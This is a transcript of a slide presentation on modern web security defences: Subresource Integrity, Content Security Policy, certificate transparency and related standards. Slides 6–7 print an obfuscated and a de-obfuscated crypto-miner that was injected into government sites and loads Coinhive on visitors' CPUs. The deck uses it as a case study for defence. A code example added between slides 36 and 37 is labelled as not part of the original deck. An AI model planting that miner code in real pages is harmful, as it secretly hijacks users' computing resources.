Modern Web Security Patterns - Chad Hollman, Analyst, County of Sacramento Department of Technology (PowerPoint PPT presentation)
  1. Modern Web Security Patterns. Chad Hollman, Analyst, County of Sacramento Department of Technology

  2. Current Issues of Web Development Security; Subresource Integrity Checking; Content Security Policies; HTTP Public Key Pinning; Certificate Authorization Authority; Security Contacts Standard

  3. Current Issues of Web Development Security; Subresource Integrity Checking; Content Security Policies; Expect Certificate Transparency; Certificate Authorization Authority; Security Contacts Standard

  4. Current Issues of Web Development Security; Subresource Integrity Checking; Content Security Policies; Expect Certificate Transparency; Certificate Authorization Authority; Security Contacts Standard

  5. Current Issues of Web Development Security: government, health-care, and education web sites with an embedded crypto-miner

  6. Current Issues of Web Development Security: obfuscated JavaScript with crypto-miner. The file begins /* [Warning] Do not copy or self host this file, you will not be supported */ /* BrowseAloud Plus v2.5.0 (13-09-2017) */ and continues as hex-escaped window["document"]["write"] calls; the de-obfuscated version is on the next slide.

  7. Current Issues of Web Development Security: de-obfuscated crypto-miner. window["document"]["write"]("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?rnd="+window["Math"]["random"]()+"'></script>");window["document"]["write"]('<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = {threads: 8,throttle:0.6}} var miner = new CoinHive.Anonymous(\'1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq\', cpuConfig);miner.start();</script>');

  8. Current Issues of Web Development Security; Subresource Integrity Checking; Content Security Policies; Expect Certificate Transparency; Certificate Authorization Authority; Security Contacts Standard

  9. How do they work?

  10. It’s really easy

  11. browser requests external resource

  12. cdn returns resource

  13. browser hashes returned resource

  14. browser compares hash against integrity attribute in tag

  15. hashes match: content is loaded

  16. hashes do not match: content is not loaded

  17. Embedding an SRI in your site. First, generate the cryptographic hash of your external script: https://www.srihash.org/

  18. Embedding an SRI in your site. Second, add the generated hash to the script call: <script src="https://example.com/example-framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" ...> </script>

  19. Subresource Integrity Checking: when SRIs fail

  20. Subresource Integrity Checking: are SRIs supported by my browser?

  21. But what happens if the script updates?

  22. Current Issues of Web Development Security; Subresource Integrity Checking; Content Security Policies; Expect Certificate Transparency; Certificate Authorization Authority; Security Contacts Standard

  23. Content Security Policies: the complement to SRIs. A good content security policy (CSP) would have stopped the crypto-miner from being loaded. A CSP can be implemented as part of a response header or as meta tags; it can run in report-only mode, which reports CSP violations without actually enforcing the policy; and it lets you whitelist the sources of each content type. Effectively it says, "yes, you can run whatever you want in this file, but you can only load from these places".

  24. Content Security Policies: content security policies as meta tags <meta http-equiv="Content-Security-Policy" content="default-src 'none'; connect-src bloghelpers.troyhunt.com links.services.disqus.com www.google-analytics.com stats.g.doubleclick.net syndication.twitter.com troyhunt.report-uri.com troyhunt.report-uri.com; font-src 'self' cdnjs.cloudflare.com fonts.gstatic.com; frame-src disqus.com c.disquscdn.com www.google.com www.youtube.com player.vimeo.com twitter.com platform.twitter.com syndication.twitter.com omny.fm pastebin.com; img-src 'self' c.disquscdn.com referrer.disqus.com stats.g.doubleclick.net www.google-analytics.com www.gstatic.com syndication.twitter.com platform.twitter.com *.twimg.com data:; script-src 'self' c.disquscdn.com disqus.com troyhunt.disqus.com www.google.com www.google-analytics.com www.gstatic.com cdnjs.cloudflare.com platform.twitter.com cdn.syndication.twimg.com syndication.twitter.com gist.github.com/troyhunt/ 'sha256-dblwN9MUF0KZKfqYU7U9hiLjNSW2nX1koQRMVTelpsA=' 'sha256-4JqPqO/eQLWuWw1AE7dCvI9hPwiBcw0gy7uoLqS0ncg=' 'sha256-q7PyCIWqx04xiOpJNrqiwsSEIdeaqyhUMFifRsUwUDk=' cdn.report-uri.com; style-src 'self' 'unsafe-inline' c.disquscdn.com cdnjs.cloudflare.com fonts.googleapis.com platform.twitter.com ton.twimg.com assets-cdn.github.com github.githubassets.com; prefetch-src c.disquscdn.com disqus.com; upgrade-insecure-requests">

  25. Content Security Policies: content security policies with reporting as response headers

  26. Content Security Policies: content security policies with a reporting URL handled by my web server

  27. Content Security Policies: content security policies as response headers in the browser

  28. Content Security Policies: content security policy violations in the browser

  29. Content Security Policies: content security policy reporting with embedded script <script type="text/json" id="csp-report-uri"> { "keys": [ "blockedURI", "columnNumber", "disposition", "documentURI", "effectiveDirective", "lineNumber", "originalPolicy", "referrer", "sample", "sourceFile", "statusCode", "violatedDirective" ], "reportUri" : "https://troyhunt.report-uri.com/r/d/csp/enforce" } </script>

  30. Content Security Policies: upgrade insecure requests

  31. Content Security Policies: upgrade insecure requests

  32. Content Security Policies: upgrade insecure requests

  33. Content Security Policies: upgrade insecure requests

  34. Content Security Policies: upgrade insecure requests

  35. Content Security Policies: upgrade insecure requests

  36. CSP fetch directives (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy):
  default-src: serves as a fallback for all other fetch directives
  connect-src: restricts the URLs which can be loaded using script interfaces
  font-src: specifies valid sources for fonts loaded using @font-face
  frame-src: specifies valid sources for nested browsing contexts loaded using elements such as <frame> and <iframe>
  img-src: specifies valid sources of images and favicons
  media-src: specifies valid sources for loading media using <audio>, <video> and <track> elements
  script-src: specifies valid sources for JavaScript <script> elements
  style-src: specifies valid sources for stylesheets
  worker-src: specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts
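The whitelisting described on slides 23 and 24 and the default-src fallback of slide 36, as an added Node.js example (not code from the slides): a minimal evaluator for CSP fetch directives that decides whether a given fetch would be allowed. The policy string and the https://www.example.com page origin are constructed for the demonstration; the Coinhive URL is the one the de-obfuscated miner on slide 7 loads.

```javascript
// Added example, not from the slides: a minimal evaluator for CSP fetch
// directives showing default-src fallback (slide 36) and host-source
// whitelisting (slides 23-24). Scope: host sources, 'self', 'none', '*' and
// scheme sources such as data:; nonces, hashes and 'strict-dynamic' are not handled.

// "default-src 'none'; script-src 'self' a.com" -> { "default-src": ["'none'"], ... }
function parsePolicy(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !(name.toLowerCase() in directives)) directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Does one source expression allow a fetch of `url` from a page at `pageOrigin`?
function sourceMatches(src, url, pageOrigin) {
  const s = src.toLowerCase();
  if (s === "'self'") return url.origin === pageOrigin;
  if (s.startsWith("'")) return false;          // 'none', keywords, nonces, hashes never match a URL
  if (s === "*") return /^(https?|wss?):$/.test(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;   // scheme-source, e.g. "data:"
  // host-source: [scheme://][*.]host[:port][/path]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\d+|\*))?(\/.*)?$/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port, path] = m;
  if (scheme && url.protocol !== scheme + ":" && !(scheme === "http" && url.protocol === "https:")) return false;
  if (wildcard ? !url.hostname.endsWith("." + host) : url.hostname !== host) return false;
  const urlPort = url.port || (url.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && urlPort !== port) return false;
  if (path && (path.endsWith("/") ? !url.pathname.startsWith(path) : url.pathname !== path)) return false;
  return true;
}

// Is a fetch of `urlString` governed by `directive` (e.g. "script-src") allowed?
// A missing fetch directive falls back to default-src; with neither present the
// browser imposes no restriction on that fetch. An empty source list means 'none'.
function allowed(policy, directive, urlString, pageOrigin) {
  const directives = parsePolicy(policy);
  const sources = directives[directive] ?? directives["default-src"];
  if (sources === undefined) return true;
  const url = new URL(urlString);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// Constructed policy and page origin for the demonstration.
const POLICY = "default-src 'none'; script-src 'self' cdnjs.cloudflare.com www.google-analytics.com; " +
  "img-src 'self' data: *.twimg.com; style-src 'self' 'unsafe-inline'";
const PAGE_ORIGIN = "https://www.example.com";
```

With this policy, allowed(POLICY, "script-src", "https://coinhive.com/lib/coinhive.min.js", PAGE_ORIGIN) is false, and a connect-src or font-src fetch is also refused because those directives fall back to default-src 'none'.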

  37. Content Security Policies: are CSPs supported by my browser?

  38. Current Issues of Web Development Security; Subresource Integrity Checking; Content Security Policies; Expect Certificate Transparency; Certificate Authorization Authority; Security Contacts Standard

  39. https://www.smashingmagazine.com/be-afraid-of-public-key-pinning/

  40. 2011: DigiNotar, Dutch Certificate Authority

  41. 500 fake SSL certificates including sites like facebook.com and google.com

  42. Expect Certificate Transparency. CT is a tool that allows you to detect when a fake certificate has been issued. When a CA participates in the program, it must log all certificates it issues in a publicly searchable log. The logs are monitored by an application that can report to you whenever a new cert for one of your domains is issued. If the cert was issued in error (or maliciously), you can immediately take steps to have it revoked.

  43. Expect Certificate Transparency: Expect-CT tells the browser you only want it to trust certificates signed by CAs that have Certificate Transparency enabled
